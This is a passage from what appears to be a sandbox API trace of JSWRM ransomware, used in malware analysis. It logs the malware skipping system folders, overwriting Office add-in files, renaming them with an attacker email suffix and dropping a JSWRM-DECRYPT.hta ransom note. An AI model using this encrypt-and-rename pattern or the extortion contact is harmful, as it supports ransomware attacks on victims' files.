(lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="msocache") returned -1 [0126.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0126.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d0d8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.SqlServer.Types.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0126.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0126.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d260, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.SqlServer.Types.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0126.843] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf632eb9d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf632eb9d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf632eb9d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2e88, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="ReportingServicesNativeClient.resources.dll", cAlternateFileName="REPORT~1.DLL")) returned 1 [0126.843] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2=".") returned 1 [0126.843] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="..") returned 1 [0126.843] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="...") returned 1 [0126.843] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="windows") returned -1 [0126.843] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="recovery") returned 1 [0126.843] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="perflogs") returned 1 [0126.843] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="documents and settings") returned 1 [0126.843] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.843] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="system volume information") returned -1 [0126.843] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="msocache") returned 1 [0126.843] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0126.843] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d0d8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReportingServicesNativeClient.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0126.843] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0126.843] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReportingServicesNativeClient.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0126.843] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf632eb9d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf632eb9d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf632eb9d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2e88, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="ReportingServicesNativeClient.resources.dll", cAlternateFileName="REPORT~1.DLL")) returned 0 [0126.843] FindClose (in: hFindFile=0x232240 | out: hFindFile=0x232240) returned 1 [0126.843] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa879350, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa879350, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa8eba59, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2ba48, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="PowerPivotExcelClientAddIn.dll", cAlternateFileName="POWERP~1.DLL")) returned 1 [0126.843] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.dll", lpString2=".") returned 1 [0126.843] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.dll", lpString2="..") returned 1 [0126.843] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.dll", lpString2="...") returned 1 [0126.843] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.dll", lpString2="windows") returned -1 [0126.843] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.dll", lpString2="recovery") returned -1 [0126.843] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.dll", lpString2="perflogs") returned 1 [0126.843] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.dll", lpString2="documents and settings") returned 1 [0126.843] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.843] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.dll", lpString2="system volume information") returned -1 [0126.843] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.dll", lpString2="msocache") returned 1 [0126.843] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.dll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0126.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.dll", cchWideChar=30, lpMultiByteStr=0x241178, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPivotExcelClientAddIn.dll", lpUsedDefaultChar=0x0) returned 30 [0126.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.dll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0126.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.dll", cchWideChar=30, lpMultiByteStr=0x241268, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPivotExcelClientAddIn.dll", lpUsedDefaultChar=0x0) returned 30 [0126.844] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x167cf4d5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x167cf4d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167f56e9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xab0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="PowerPivotExcelClientAddIn.tlb", cAlternateFileName="POWERP~1.TLB")) returned 1 [0126.844] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.tlb", lpString2=".") returned 1 [0126.844] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.tlb", lpString2="..") returned 1 [0126.844] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.tlb", lpString2="...") returned 1 [0126.844] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.tlb", lpString2="windows") returned -1 [0126.844] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.tlb", lpString2="recovery") returned -1 [0126.844] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.tlb", lpString2="perflogs") returned 1 [0126.844] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.tlb", lpString2="documents and settings") returned 1 [0126.844] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.tlb", lpString2="$RECYCLE.BIN") returned 1 [0126.844] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.tlb", lpString2="system volume information") returned -1 [0126.844] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.tlb", lpString2="msocache") returned 1 [0126.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.tlb", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0126.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.tlb", cchWideChar=30, lpMultiByteStr=0x2413a8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPivotExcelClientAddIn.tlb", lpUsedDefaultChar=0x0) returned 30 [0126.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.tlb", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0126.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.tlb", cchWideChar=30, lpMultiByteStr=0x241060, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPivotExcelClientAddIn.tlb", lpUsedDefaultChar=0x0) returned 30 [0126.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.844] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\PowerPivotExcelClientAddIn.tlb" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\powerpivotexcelclientaddin.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0126.845] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2736) returned 1 [0126.845] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.845] ReadFile (in: hFile=0x314, lpBuffer=0x278330, nNumberOfBytesToRead=0xab0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e534*=0xab0, lpOverlapped=0x0) returned 1 [0126.847] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.848] WriteFile (in: hFile=0x314, lpBuffer=0x278330*, nNumberOfBytesToWrite=0xab0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e530*=0xab0, lpOverlapped=0x0) returned 1 [0126.848] CloseHandle (hObject=0x314) returned 1 [0126.848] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\PowerPivotExcelClientAddIn.tlb" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\powerpivotexcelclientaddin.tlb"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\PowerPivotExcelClientAddIn.tlb.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\powerpivotexcelclientaddin.tlb.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0126.849] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff31e88, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167cf4d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167cf4d5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="pt", cAlternateFileName="")) returned 1 [0126.849] lstrcmpiW (lpString1="pt", lpString2=".") returned 1 [0126.849] lstrcmpiW (lpString1="pt", lpString2="..") returned 1 [0126.849] lstrcmpiW (lpString1="pt", lpString2="...") returned 1 [0126.849] lstrcmpiW (lpString1="pt", lpString2="windows") returned -1 [0126.849] lstrcmpiW (lpString1="pt", lpString2="recovery") returned -1 [0126.849] lstrcmpiW (lpString1="pt", lpString2="perflogs") returned 1 [0126.849] lstrcmpiW (lpString1="pt", lpString2="documents and settings") returned 1 [0126.849] lstrcmpiW (lpString1="pt", lpString2="$RECYCLE.BIN") returned 1 [0126.849] lstrcmpiW (lpString1="pt", lpString2="system volume information") returned -1 [0126.849] lstrcmpiW (lpString1="pt", lpString2="msocache") returned 1 [0126.849] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\pt\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\pt\\jswrm-decrypt.hta")) returned 0xffffffff [0126.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.850] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\pt\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\pt\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0126.851] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.851] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0126.852] CloseHandle (hObject=0x314) returned 1 [0126.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0126.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27a100 | out: hHeap=0x1e0000) returned 1 [0126.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0126.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0126.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0126.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0126.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0126.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0126.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0126.852] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\pt\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\pt\\jswrm-decrypt.hta")) returned 0x20 [0126.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0126.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0126.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0126.852] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\pt\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff31e88, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167cf4d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4245009f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231c40 [0126.852] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0126.852] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff31e88, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167cf4d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4245009f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0126.852] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0126.852] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0126.852] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4245009f, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4245009f, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4245009f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0126.852] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0126.852] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0126.853] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0126.853] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0126.853] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0126.853] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0126.853] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0126.853] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0126.853] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0126.853] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0126.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0126.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0126.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0126.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0126.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0126.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241060, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0126.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22dff8 [0126.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0126.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0126.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0126.853] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x167cf4d5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x167cf4d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167f56e9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x110a, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="LocalizedStrings.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0126.853] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2=".") returned 1 [0126.853] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="..") returned 1 [0126.853] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="...") returned 1 [0126.853] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="windows") returned -1 [0126.853] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="recovery") returned -1 [0126.853] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="perflogs") returned -1 [0126.853] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="documents and settings") returned 1 [0126.853] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="$RECYCLE.BIN") returned 1 [0126.853] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="system volume information") returned -1 [0126.853] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="msocache") returned -1 [0126.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0126.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0126.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x2411c8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedStrings.xml", lpUsedDefaultChar=0x0) returned 20 [0126.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0126.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0126.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x240f20, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedStrings.xml", lpUsedDefaultChar=0x0) returned 20 [0126.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0126.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22dff8 | out: hHeap=0x1e0000) returned 1 [0126.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.854] 